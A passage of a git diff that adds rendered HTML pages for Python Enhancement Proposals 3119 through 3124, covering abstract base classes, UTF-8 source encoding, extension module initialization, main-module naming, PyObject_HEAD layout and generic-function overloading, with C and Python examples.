Concrete method returning the items as a Set. The default +concrete implementation returns a “view” on the item set; +subclasses are not required to return a view but they should +return a Set.
+
.values()
Concrete method returning the values as a sized, iterable +container (not a set!). The default concrete implementation +returns a “view” on the values of the mapping; subclasses are +not required to return a view but they should return a sized, +iterable container.
+
+

The following invariants should hold for any mapping m:

+
len(m.values()) == len(m.keys()) == len(m.items()) == len(m)
+[value for value in m.values()] == [m[key] for key in m.keys()]
+[item for item in m.items()] == [(key, m[key]) for key in m.keys()]
+
+
+

i.e. iterating over the items, keys and values should return +results in the same order.

+
+
MutableMapping
A subclass of Mapping that also implements some standard +mutating methods. Abstract methods include __setitem__, +__delitem__. Concrete methods include pop, popitem, +clear, update. Note: setdefault is not included. +Open issues: Write out the specs for the methods.
+
+
+
+

Sequences

+

These abstract classes represent read-only sequences and mutable +sequences.

+

The built-in list and bytes types derive from +MutableSequence. The built-in tuple and str types derive +from Sequence and Hashable.

+
+
Sequence
A subclass of Iterable, Sized, Container. It +defines a new abstract method __getitem__ that has a somewhat +complicated signature: when called with an integer, it returns an +element of the sequence or raises IndexError; when called with +a slice object, it returns another Sequence. The concrete +__iter__ method iterates over the elements using +__getitem__ with integer arguments 0, 1, and so on, until +IndexError is raised. The length should be equal to the +number of values returned by the iterator.

Open issues: Other candidate methods, which can all have +default concrete implementations that only depend on __len__ +and __getitem__ with an integer argument: __reversed__, +index, count, __add__, __mul__.

+
+
MutableSequence
A subclass of Sequence adding some standard mutating methods. +Abstract mutating methods: __setitem__ (for integer indices as +well as slices), __delitem__ (ditto), insert. Concrete +mutating methods: append, reverse, extend, pop, +remove. Concrete mutating operators: +=, *= (these +mutate the object in place). Note: this does not define +sort() – that is only required to exist on genuine list +instances.
+
+
+
+
+

Strings

+

Python 3000 will likely have at least two built-in string types: byte +strings (bytes), deriving from MutableSequence, and (Unicode) +character strings (str), deriving from Sequence and +Hashable.

+

Open issues: define the base interfaces for these so alternative +implementations and subclasses know what they are in for. This may be +the subject of a new PEP or PEPs (PEP 358 should be co-opted for the +bytes type).

+
+
+
+

ABCs vs. Alternatives

+

In this section I will attempt to compare and contrast ABCs to other +approaches that have been proposed.

+
+

ABCs vs. Duck Typing

+

Does the introduction of ABCs mean the end of Duck Typing? I don’t +think so. Python will not require that a class derives from +BasicMapping or Sequence when it defines a __getitem__ +method, nor will the x[y] syntax require that x is an instance +of either ABC. You will still be able to assign any “file-like” +object to sys.stdout, as long as it has a write method.

+

Of course, there will be some carrots to encourage users to derive +from the appropriate base classes; these vary from default +implementations for certain functionality to an improved ability to +distinguish between mappings and sequences. But there are no sticks. +If hasattr(x, "__len__") works for you, great! ABCs are intended to +solve problems that don’t have a good solution at all in Python 2, +such as distinguishing between mappings and sequences.

+
+
+

ABCs vs. Generic Functions

+

ABCs are compatible with Generic Functions (GFs). For example, my own +Generic Functions implementation [4] uses the classes (types) of the +arguments as the dispatch key, allowing derived classes to override +base classes. Since (from Python’s perspective) ABCs are quite +ordinary classes, using an ABC in the default implementation for a GF +can be quite appropriate. For example, if I have an overloaded +prettyprint function, it would make total sense to define +pretty-printing of sets like this:

+
@prettyprint.register(Set)
+def pp_set(s):
+    return "{" + ... + "}"  # Details left as an exercise
+
+
+

and implementations for specific subclasses of Set could be added +easily.

+

I believe ABCs also won’t present any problems for RuleDispatch, +Phillip Eby’s GF implementation in PEAK [5].

+

Of course, GF proponents might claim that GFs (and concrete, or +implementation, classes) are all you need. But even they will not +deny the usefulness of inheritance; and one can easily consider the +ABCs proposed in this PEP as optional implementation base classes; +there is no requirement that all user-defined mappings derive from +BasicMapping.

+
+
+

ABCs vs. Interfaces

+

ABCs are not intrinsically incompatible with Interfaces, but there is +considerable overlap. For now, I’ll leave it to proponents of +Interfaces to explain why Interfaces are better. I expect that much +of the work that went into e.g. defining the various shades of +“mapping-ness” and the nomenclature could easily be adapted for a +proposal to use Interfaces instead of ABCs.

+

“Interfaces” in this context refers to a set of proposals for +additional metadata elements attached to a class which are not part of +the regular class hierarchy, but do allow for certain types of +inheritance testing.

+

Such metadata would be designed, at least in some proposals, so as to +be easily mutable by an application, allowing application writers to +override the normal classification of an object.

+

The drawback to this idea of attaching mutable metadata to a class is +that classes are shared state, and mutating them may lead to conflicts +of intent. Additionally, the need to override the classification of +an object can be done more cleanly using generic functions: In the +simplest case, one can define a “category membership” generic function +that simply returns False in the base implementation, and then provide +overrides that return True for any classes of interest.

+
+
+
+

References

+ +

[2] Incomplete implementation prototype, by GvR + (https://web.archive.org/web/20170223133820/http://svn.python.org/view/sandbox/trunk/abc/)

+

[3] Possible Python 3K Class Tree?, wiki page created by Bill Janssen + (https://wiki.python.org/moin/AbstractBaseClasses)

+ +

[9] Partial order, in Wikipedia + (https://en.wikipedia.org/wiki/Partial_order)

+

[10] Total order, in Wikipedia + (https://en.wikipedia.org/wiki/Total_order)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3119.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3120/index.html b/pep-3120/index.html new file mode 100644 index 00000000000..309141dff53 --- /dev/null +++ b/pep-3120/index.html @@ -0,0 +1,197 @@ + + + + + + + + PEP 3120 – Using UTF-8 as the default source encoding | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3120 – Using UTF-8 as the default source encoding

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Specification

+

This PEP proposes to change the default source encoding from ASCII to +UTF-8. Support for alternative source encodings (PEP 263) continues to +exist; an explicit encoding declaration takes precedence over the +default.

+
+
+

A Bit of History

+

In Python 1, the source encoding was unspecified, except that the +source encoding had to be a superset of the system’s basic execution +character set (i.e. an ASCII superset, on most systems). The source +encoding was only relevant for the lexis itself (bytes representing +letters for keywords, identifiers, punctuation, line breaks, etc). +The contents of a string literal was copied literally from the file +on source.

+

In Python 2.0, the source encoding changed to Latin-1 as a side effect +of introducing Unicode. For Unicode string literals, the characters +were still copied literally from the source file, but widened on a +character-by-character basis. As Unicode gives a fixed interpretation +to code points, this algorithm effectively fixed a source encoding, at +least for files containing non-ASCII characters in Unicode literals.

+

PEP 263 identified the problem that you can use only those Unicode +characters in a Unicode literal which are also in Latin-1, and +introduced a syntax for declaring the source encoding. If no source +encoding was given, the default should be ASCII. For compatibility +with Python 2.0 and 2.1, files were interpreted as Latin-1 for a +transitional period. This transition ended with Python 2.5, which +gives an error if non-ASCII characters are encountered and no source +encoding is declared.

+
+
+

Rationale

+

With PEP 263, using arbitrary non-ASCII characters in a Python file is +possible, but tedious. One has to explicitly add an encoding +declaration. Even though some editors (like IDLE and Emacs) support +the declarations of PEP 263, many editors still do not (and never +will); users have to explicitly adjust the encoding which the editor +assumes on a file-by-file basis.

+

When the default encoding is changed to UTF-8, adding non-ASCII text +to Python files becomes easier and more portable: On some systems, +editors will automatically choose UTF-8 when saving text (e.g. on Unix +systems where the locale uses UTF-8). On other systems, editors will +guess the encoding when reading the file, and UTF-8 is easy to +guess. Yet other editors support associating a default encoding with a +file extension, allowing users to associate .py with UTF-8.

+

For Python 2, an important reason for using non-UTF-8 encodings was +that byte string literals would be in the source encoding at run-time, +allowing then to output them to a file or render them to the user +as-is. With Python 3, all strings will be Unicode strings, so the +original encoding of the source will have no impact at run-time.

+
+
+

Implementation

+

The parser needs to be changed to accept bytes > 127 if no source +encoding is specified; instead of giving an error, it needs to check +that the bytes are well-formed UTF-8 (decoding is not necessary, +as the parser converts all source code to UTF-8, anyway).

+

IDLE needs to be changed to use UTF-8 as the default encoding.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3120.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3121/index.html b/pep-3121/index.html new file mode 100644 index 00000000000..9a5c262ca8f --- /dev/null +++ b/pep-3121/index.html @@ -0,0 +1,342 @@ + + + + + + + + PEP 3121 – Extension Module Initialization and Finalization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3121 – Extension Module Initialization and Finalization

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyInit_modulename() and +PyModuleDef.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Extension module initialization currently has a few deficiencies. +There is no cleanup for modules, the entry point name might give +naming conflicts, the entry functions don’t follow the usual calling +convention, and multiple interpreters are not supported well. This PEP +addresses these issues.

+
+
+

Problems

+
+

Module Finalization

+

Currently, extension modules are initialized usually once and then +“live” forever. The only exception is when Py_Finalize() is called: +then the initialization routine is invoked a second time. This is bad +from a resource management point of view: memory and other resources +might get allocated each time initialization is called, but there is +no way to reclaim them. As a result, there is currently no way to +completely release all resources Python has allocated.

+
+
+

Entry point name conflicts

+

The entry point is currently called init<module>. This might conflict +with other symbols also called init<something>. In particular, +initsocket is known to have conflicted in the past (this specific +problem got resolved as a side effect of renaming the module to +_socket).

+
+
+

Entry point signature

+

The entry point is currently a procedure (returning void). This +deviates from the usual calling conventions; callers can find out +whether there was an error during initialization only by checking +PyErr_Occurred. The entry point should return a PyObject*, which will +be the module created, or NULL in case of an exception.

+
+
+

Multiple Interpreters

+

Currently, extension modules share their state across all +interpreters. This allows for undesirable information leakage across +interpreters: one script could permanently corrupt objects in an +extension module, possibly breaking all scripts in other interpreters.

+
+
+
+

Specification

+

The module initialization routines change their signature +to:

+
PyObject *PyInit_<modulename>()
+
+
+

The initialization routine will be invoked once per +interpreter, when the module is imported. It should +return a new module object each time.

+

In order to store per-module state in C variables, +each module object will contain a block of memory +that is interpreted only by the module. The amount +of memory used for the module is specified at +the point of creation of the module.

+

In addition to the initialization function, a module +may implement a number of additional callback +functions, which are invoked when the module’s +tp_traverse, tp_clear, and tp_free functions are +invoked, and when the module is reloaded.

+

The entire module definition is combined in a struct +PyModuleDef:

+
struct PyModuleDef{
+  PyModuleDef_Base m_base;  /* To be filled out by the interpreter */
+  Py_ssize_t m_size; /* Size of per-module data */
+  PyMethodDef *m_methods;
+  inquiry m_reload;
+  traverseproc m_traverse;
+  inquiry m_clear;
+  freefunc m_free;
+};
+
+
+

Creation of a module is changed to expect an optional +PyModuleDef*. The module state will be +null-initialized.

+

Each module method will be passed the module object +as the first parameter. To access the module data, +a function:

+
void* PyModule_GetState(PyObject*);
+
+
+

will be provided. In addition, to lookup a module +more efficiently than going through sys.modules, +a function:

+
PyObject* PyState_FindModule(struct PyModuleDef*);
+
+
+

will be provided. This lookup function will use an +index located in the m_base field, to find the +module by index, not by name.

+

As all Python objects should be controlled through +the Python memory management, usage of “static” +type objects is discouraged, unless the type object +itself has no memory-managed state. To simplify +definition of heap types, a new method:

+
PyTypeObject* PyType_Copy(PyTypeObject*);
+
+
+

is added.

+
+
+

Example

+

xxmodule.c would be changed to remove the initxx +function, and add the following code instead:

+
struct xxstate{
+  PyObject *ErrorObject;
+  PyObject *Xxo_Type;
+};
+
+#define xxstate(o) ((struct xxstate*)PyModule_GetState(o))
+
+static int xx_traverse(PyObject *m, visitproc v,
+                       void *arg)
+{
+  Py_VISIT(xxstate(m)->ErrorObject);
+  Py_VISIT(xxstate(m)->Xxo_Type);
+  return 0;
+}
+
+static int xx_clear(PyObject *m)
+{
+  Py_CLEAR(xxstate(m)->ErrorObject);
+  Py_CLEAR(xxstate(m)->Xxo_Type);
+  return 0;
+}
+
+static struct PyModuleDef xxmodule = {
+  {}, /* m_base */
+  sizeof(struct xxstate),
+  &xx_methods,
+  0,  /* m_reload */
+  xx_traverse,
+  xx_clear,
+  0,  /* m_free - not needed, since all is done in m_clear */
+}
+
+PyObject*
+PyInit_xx()
+{
+  PyObject *res = PyModule_New("xx", &xxmodule);
+  if (!res) return NULL;
+  xxstate(res)->ErrorObject = PyErr_NewException("xx.error", NULL, NULL);
+  if (!xxstate(res)->ErrorObject) {
+    Py_DECREF(res);
+    return NULL;
+  }
+  xxstate(res)->XxoType = PyType_Copy(&Xxo_Type);
+  if (!xxstate(res)->Xxo_Type) {
+    Py_DECREF(res);
+    return NULL;
+  }
+  return res;
+}
+
+
+
+
+

Discussion

+

Tim Peters reports in [1] that PythonLabs considered such a feature +at one point, and lists the following additional hooks which aren’t +currently supported in this PEP:

+
    +
  • when the module object is deleted from sys.modules
  • +
  • when Py_Finalize is called
  • +
  • when Python exits
  • +
  • when the Python DLL is unloaded (Windows only)
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3121.rst

+

Last modified: 2023-10-11 09:31:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3122/index.html b/pep-3122/index.html new file mode 100644 index 00000000000..ecbb41370c5 --- /dev/null +++ b/pep-3122/index.html @@ -0,0 +1,366 @@ + + + + + + + + PEP 3122 – Delineation of the main module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3122 – Delineation of the main module

+
+
Author:
+
Brett Cannon
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP has been rejected. Guido views running scripts within a +package as an anti-pattern [3].

+
+
+

Abstract

+

Because of how name resolution works for relative imports in a world +where PEP 328 is implemented, the ability to execute modules within a +package ceases being possible. This failing stems from the fact that +the module being executed as the “main” module replaces its +__name__ attribute with "__main__" instead of leaving it as +the absolute name of the module. This breaks import’s ability +to resolve relative imports from the main module into absolute names.

+

In order to resolve this issue, this PEP proposes to change how the +main module is delineated. By leaving the __name__ attribute in +a module alone and setting sys.main to the name of the main +module this will allow at least some instances of executing a module +within a package that uses relative imports.

+

This PEP does not address the idea of introducing a module-level +function that is automatically executed like PEP 299 proposes.

+
+
+

The Problem

+

With the introduction of PEP 328, relative imports became dependent on +the __name__ attribute of the module performing the import. This +is because the use of dots in a relative import are used to strip away +parts of the calling module’s name to calculate where in the package +hierarchy an import should fall (prior to PEP 328 relative +imports could fail and would fall back on absolute imports which had a +chance of succeeding).

+

For instance, consider the import from .. import spam made from the +bacon.ham.beans module (bacon.ham.beans is not a package +itself, i.e., does not define __path__). Name resolution of the +relative import takes the caller’s name (bacon.ham.beans), splits +on dots, and then slices off the last n parts based on the level +(which is 2). In this example both ham and beans are dropped +and spam is joined with what is left (bacon). This leads to +the proper import of the module bacon.spam.

+

This reliance on the __name__ attribute of a module when handling +relative imports becomes an issue when executing a script within a +package. Because the executing script has its name set to +'__main__', import cannot resolve any relative imports, leading to +an ImportError.

+

For example, assume we have a package named bacon with an +__init__.py file containing:

+
from . import spam
+
+
+

Also create a module named spam within the bacon package (it +can be an empty file). Now if you try to execute the bacon +package (either through python bacon/__init__.py or +python -m bacon) you will get an ImportError about trying to +do a relative import from within a non-package. Obviously the import +is valid, but because of the setting of __name__ to '__main__' +import thinks that bacon/__init__.py is not in a package since no +dots exist in __name__. To see how the algorithm works in more +detail, see importlib.Import._resolve_name() in the sandbox +[2].

+

Currently a work-around is to remove all relative imports in the +module being executed and make them absolute. This is unfortunate, +though, as one should not be required to use a specific type of +resource in order to make a module in a package be able to be +executed.

+
+
+

The Solution

+

The solution to the problem is to not change the value of __name__ +in modules. But there still needs to be a way to let executing code +know it is being executed as a script. This is handled with a new +attribute in the sys module named main.

+

When a module is being executed as a script, sys.main will be set +to the name of the module. This changes the current idiom of:

+
if __name__ == '__main__':
+    ...
+
+
+

to:

+
import sys
+if __name__ == sys.main:
+    ...
+
+
+

The newly proposed solution does introduce an added line of +boilerplate which is a module import. But as the solution does not +introduce a new built-in or module attribute (as discussed in +Rejected Ideas) it has been deemed worth the extra line.

+

Another issue with the proposed solution (which also applies to all +rejected ideas as well) is that it does not directly solve the problem +of discovering the name of a file. Consider python bacon/spam.py. +By the file name alone it is not obvious whether bacon is a +package. In order to properly find this out both the current +direction must exist on sys.path as well as bacon/__init__.py +existing.

+

But this is the simple example. Consider python ../spam.py. From +the file name alone it is not at all clear if spam.py is in a +package or not. One possible solution is to find out what the +absolute name of .., check if a file named __init__.py exists, +and then look if the directory is on sys.path. If it is not, then +continue to walk up the directory until no more __init__.py files +are found or the directory is found on sys.path.

+

This could potentially be an expensive process. If the package depth +happens to be deep then it could require a large amount of disk access +to discover where the package is anchored on sys.path, if at all. +The stat calls alone can be expensive if the file system the executed +script is on is something like NFS.

+

Because of these issues, only when the -m command-line argument +(introduced by PEP 338) is used will __name__ be set. Otherwise +the fallback semantics of setting __name__ to "__main__" will +occur. sys.main will still be set to the proper value, +regardless of what __name__ is set to.

+
+
+

Implementation

+

When the -m option is used, sys.main will be set to the +argument passed in. sys.argv will be adjusted as it is currently. +Then the equivalent of __import__(self.main) will occur. This +differs from current semantics as the runpy module fetches the +code object for the file specified by the module name in order to +explicitly set __name__ and other attributes. This is no longer +needed as import can perform its normal operation in this situation.

+

If a file name is specified, then sys.main will be set to +"__main__". The specified file will then be read and have a code +object created and then be executed with __name__ set to +"__main__". This mirrors current semantics.

+
+
+

Transition Plan

+

In order for Python 2.6 to be able to support both the current +semantics and the proposed semantics, sys.main will always be set +to "__main__". Otherwise no change will occur for Python 2.6. +This unfortunately means that no benefit from this change will occur +in Python 2.6, but it maximizes compatibility for code that is to +work as much as possible with 2.6 and 3.0.

+

To help transition to the new idiom, 2to3 [1] will gain a rule to +transform the current if __name__ == '__main__': ... idiom to the +new one. This will not help with code that checks __name__ +outside of the idiom, though.

+
+
+

Rejected Ideas

+
+

__main__ built-in

+

A counter-proposal to introduce a built-in named __main__. +The value of the built-in would be the name of the module being +executed (just like the proposed sys.main). This would lead to a +new idiom of:

+
if __name__ == __main__:
+    ...
+
+
+

A drawback is that the syntactic difference is subtle; the dropping +of quotes around “__main__”. Some believe that for existing Python +programmers bugs will be introduced where the quotation marks will be +put on by accident. But one could argue that the bug would be +discovered quickly through testing as it is a very shallow bug.

+

While the name of built-in could obviously be different (e.g., +main) the other drawback is that it introduces a new built-in. +With a simple solution such as sys.main being possible without +adding another built-in to Python, this proposal was rejected.

+
+
+

__main__ module attribute

+

Another proposal was to add a __main__ attribute to every module. +For the one that was executing as the main module, the attribute would +have a true value while all other modules had a false value. This has +a nice consequence of simplify the main module idiom to:

+
if __main__:
+    ...
+
+
+

The drawback was the introduction of a new module attribute. It also +required more integration with the import machinery than the proposed +solution.

+
+
+

Use __file__ instead of __name__

+

Any of the proposals could be changed to use the __file__ +attribute on modules instead of __name__, including the current +semantics. The problem with this is that with the proposed solutions +there is the issue of modules having no __file__ attribute defined +or having the same value as other modules.

+

The problem that comes up with the current semantics is you still have +to try to resolve the file path to a module name for the import to +work.

+
+
+

Special string subclass for __name__ that overrides __eq__

+

One proposal was to define a subclass of str that overrode the +__eq__ method so that it would compare equal to "__main__" as +well as the actual name of the module. In all other respects the +subclass would be the same as str.

+

This was rejected as it seemed like too much of a hack.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3122.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3123/index.html b/pep-3123/index.html new file mode 100644 index 00000000000..f0bf74c1e15 --- /dev/null +++ b/pep-3123/index.html @@ -0,0 +1,263 @@ + + + + + + + + PEP 3123 – Making PyObject_HEAD conform to standard C | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3123 – Making PyObject_HEAD conform to standard C

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python currently relies on undefined C behavior, with its +usage of PyObject_HEAD. This PEP proposes to change that +into standard C.

+
+
+

Rationale

+

Standard C defines that an object must be accessed only through a +pointer of its type, and that all other accesses are undefined +behavior, with a few exceptions. In particular, the following +code has undefined behavior:

+
struct FooObject{
+  PyObject_HEAD
+  int data;
+};
+
+PyObject *foo(struct FooObject*f){
+ return (PyObject*)f;
+}
+
+int bar(){
+ struct FooObject *f = malloc(sizeof(struct FooObject));
+ struct PyObject *o = foo(f);
+ f->ob_refcnt = 0;
+ o->ob_refcnt = 1;
+ return f->ob_refcnt;
+}
+
+
+

The problem here is that the storage is both accessed as +if it where struct PyObject, and as struct FooObject.

+

Historically, compilers did not have any problems with this +code. However, modern compilers use that clause as an +optimization opportunity, finding that f->ob_refcnt and +o->ob_refcnt cannot possibly refer to the same memory, and +that therefore the function should return 0, without having +to fetch the value of ob_refcnt at all in the return +statement. For GCC, Python now uses -fno-strict-aliasing +to work around that problem; with other compilers, it +may just see undefined behavior. Even with GCC, using +-fno-strict-aliasing may pessimize the generated code +unnecessarily.

+
+
+

Specification

+

Standard C has one specific exception to its aliasing rules precisely +designed to support the case of Python: a value of a struct type may +also be accessed through a pointer to the first field. E.g. if a +struct starts with an int, the struct * may also be cast to +an int *, allowing to write int values into the first field.

+

For Python, PyObject_HEAD and PyObject_VAR_HEAD will be changed +to not list all fields anymore, but list a single field of type +PyObject/PyVarObject:

+
typedef struct _object {
+  _PyObject_HEAD_EXTRA
+  Py_ssize_t ob_refcnt;
+  struct _typeobject *ob_type;
+} PyObject;
+
+typedef struct {
+  PyObject ob_base;
+  Py_ssize_t ob_size;
+} PyVarObject;
+
+#define PyObject_HEAD        PyObject ob_base;
+#define PyObject_VAR_HEAD    PyVarObject ob_base;
+
+
+

Types defined as fixed-size structure will then include PyObject +as its first field, PyVarObject for variable-sized objects. E.g.:

+
typedef struct {
+  PyObject ob_base;
+  PyObject *start, *stop, *step;
+} PySliceObject;
+
+typedef struct {
+  PyVarObject ob_base;
+  PyObject **ob_item;
+  Py_ssize_t allocated;
+} PyListObject;
+
+
+

The above definitions of PyObject_HEAD are normative, so extension +authors MAY either use the macro, or put the ob_base field explicitly +into their structs.

+

As a convention, the base field SHOULD be called ob_base. However, all +accesses to ob_refcnt and ob_type MUST cast the object pointer to +PyObject* (unless the pointer is already known to have that type), and +SHOULD use the respective accessor macros. To simplify access to +ob_type, ob_refcnt, and ob_size, macros:

+
#define Py_TYPE(o)    (((PyObject*)(o))->ob_type)
+#define Py_REFCNT(o)  (((PyObject*)(o))->ob_refcnt)
+#define Py_SIZE(o)    (((PyVarObject*)(o))->ob_size)
+
+
+

are added. E.g. the code blocks

+
#define PyList_CheckExact(op) ((op)->ob_type == &PyList_Type)
+
+return func->ob_type->tp_name;
+
+
+

needs to be changed to:

+
#define PyList_CheckExact(op) (Py_TYPE(op) == &PyList_Type)
+
+return Py_TYPE(func)->tp_name;
+
+
+

For initialization of type objects, the current sequence

+
PyObject_HEAD_INIT(NULL)
+0, /* ob_size */
+
+
+

becomes incorrect, and must be replaced with

+
PyVarObject_HEAD_INIT(NULL, 0)
+
+
+
+
+

Compatibility with Python 2.6

+

To support modules that compile with both Python 2.6 and Python 3.0, +the Py_* macros are added to Python 2.6. The macros Py_INCREF +and Py_DECREF will be changed to cast their argument to PyObject *, +so that module authors can also explicitly declare the ob_base +field in modules designed for Python 2.6.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3123.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3124/index.html b/pep-3124/index.html new file mode 100644 index 00000000000..1f3cb2844b9 --- /dev/null +++ b/pep-3124/index.html @@ -0,0 +1,1071 @@ + + + + + + + + PEP 3124 – Overloading, Generic Functions, Interfaces, and Adaptation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3124 – Overloading, Generic Functions, Interfaces, and Adaptation

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Requires:
+
3107, 3115, 3119
+
Created:
+
28-Apr-2007
+
Post-History:
+
30-Apr-2007
+
Replaces:
+
245, 246
+
+
+
+
Table of Contents +
+
+

Deferred

+

See https://mail.python.org/pipermail/python-3000/2007-July/008784.html.

+
+
+

Abstract

+

This PEP proposes a new standard library module, overloading, to +provide generic programming features including dynamic overloading +(aka generic functions), interfaces, adaptation, method combining (ala +CLOS and AspectJ), and simple forms of aspect-oriented programming +(AOP).

+

The proposed API is also open to extension; that is, it will be +possible for library developers to implement their own specialized +interface types, generic function dispatchers, method combination +algorithms, etc., and those extensions will be treated as first-class +citizens by the proposed API.

+

The API will be implemented in pure Python with no C, but may have +some dependency on CPython-specific features such as sys._getframe +and the func_code attribute of functions. It is expected that +e.g. Jython and IronPython will have other ways of implementing +similar functionality (perhaps using Java or C#).

+
+
+

Rationale and Goals

+

Python has always provided a variety of built-in and standard-library +generic functions, such as len(), iter(), pprint.pprint(), +and most of the functions in the operator module. However, it +currently:

+
    +
  1. does not have a simple or straightforward way for developers to +create new generic functions,
  2. +
  3. does not have a standard way for methods to be added to existing +generic functions (i.e., some are added using registration +functions, others require defining __special__ methods, +possibly by monkeypatching), and
  4. +
  5. does not allow dispatching on multiple argument types (except in +a limited form for arithmetic operators, where “right-hand” +(__r*__) methods can be used to do two-argument dispatch.
  6. +
+

In addition, it is currently a common anti-pattern for Python code +to inspect the types of received arguments, in order to decide what +to do with the objects. For example, code may wish to accept either +an object of some type, or a sequence of objects of that type.

+

Currently, the “obvious way” to do this is by type inspection, but +this is brittle and closed to extension. A developer using an +already-written library may be unable to change how their objects are +treated by such code, especially if the objects they are using were +created by a third party.

+

Therefore, this PEP proposes a standard library module to address +these, and related issues, using decorators and argument annotations +(PEP 3107). The primary features to be provided are:

+
    +
  • a dynamic overloading facility, similar to the static overloading +found in languages such as Java and C++, but including optional +method combination features as found in CLOS and AspectJ.
  • +
  • a simple “interfaces and adaptation” library inspired by Haskell’s +typeclasses (but more dynamic, and without any static type-checking), +with an extension API to allow registering user-defined interface +types such as those found in PyProtocols and Zope.
  • +
  • a simple “aspect” implementation to make it easy to create stateful +adapters and to do other stateful AOP.
  • +
+

These features are to be provided in such a way that extended +implementations can be created and used. For example, it should be +possible for libraries to define new dispatching criteria for +generic functions, and new kinds of interfaces, and use them in +place of the predefined features. For example, it should be possible +to use a zope.interface interface object to specify the desired +type of a function argument, as long as the zope.interface package +registered itself correctly (or a third party did the registration).

+

In this way, the proposed API simply offers a uniform way of accessing +the functionality within its scope, rather than prescribing a single +implementation to be used for all libraries, frameworks, and +applications.

+
+
+

User API

+

The overloading API will be implemented as a single module, named +overloading, providing the following features:

+
+

Overloading/Generic Functions

+

The @overload decorator allows you to define alternate +implementations of a function, specialized by argument type(s). A +function with the same name must already exist in the local namespace. +The existing function is modified in-place by the decorator to add +the new implementation, and the modified function is returned by the +decorator. Thus, the following code:

+
from overloading import overload
+from collections import Iterable
+
+def flatten(ob):
+    """Flatten an object to its component iterables"""
+    yield ob
+
+@overload
+def flatten(ob: Iterable):
+    for o in ob:
+        for ob in flatten(o):
+            yield ob
+
+@overload
+def flatten(ob: basestring):
+    yield ob
+
+
+

creates a single flatten() function whose implementation roughly +equates to:

+
def flatten(ob):
+    if isinstance(ob, basestring) or not isinstance(ob, Iterable):
+        yield ob
+    else:
+        for o in ob:
+            for ob in flatten(o):
+                yield ob
+
+
+

except that the flatten() function defined by overloading +remains open to extension by adding more overloads, while the +hardcoded version cannot be extended.

+

For example, if someone wants to use flatten() with a string-like +type that doesn’t subclass basestring, they would be out of luck +with the second implementation. With the overloaded implementation, +however, they can either write this:

+
@overload
+def flatten(ob: MyString):
+    yield ob
+
+
+

or this (to avoid copying the implementation):

+
from overloading import RuleSet
+RuleSet(flatten).copy_rules((basestring,), (MyString,))
+
+
+

(Note also that, although PEP 3119 proposes that it should be possible +for abstract base classes like Iterable to allow classes like +MyString to claim subclass-hood, such a claim is global, +throughout the application. In contrast, adding a specific overload +or copying a rule is specific to an individual function, and therefore +less likely to have undesired side effects.)

+
+

@overload vs. @when

+

The @overload decorator is a common-case shorthand for the more +general @when decorator. It allows you to leave out the name of +the function you are overloading, at the expense of requiring the +target function to be in the local namespace. It also doesn’t support +adding additional criteria besides the ones specified via argument +annotations. The following function definitions have identical +effects, except for name binding side-effects (which will be described +below):

+
from overloading import when
+
+@overload
+def flatten(ob: basestring):
+    yield ob
+
+@when(flatten)
+def flatten(ob: basestring):
+    yield ob
+
+@when(flatten)
+def flatten_basestring(ob: basestring):
+    yield ob
+
+@when(flatten, (basestring,))
+def flatten_basestring(ob):
+    yield ob
+
+
+

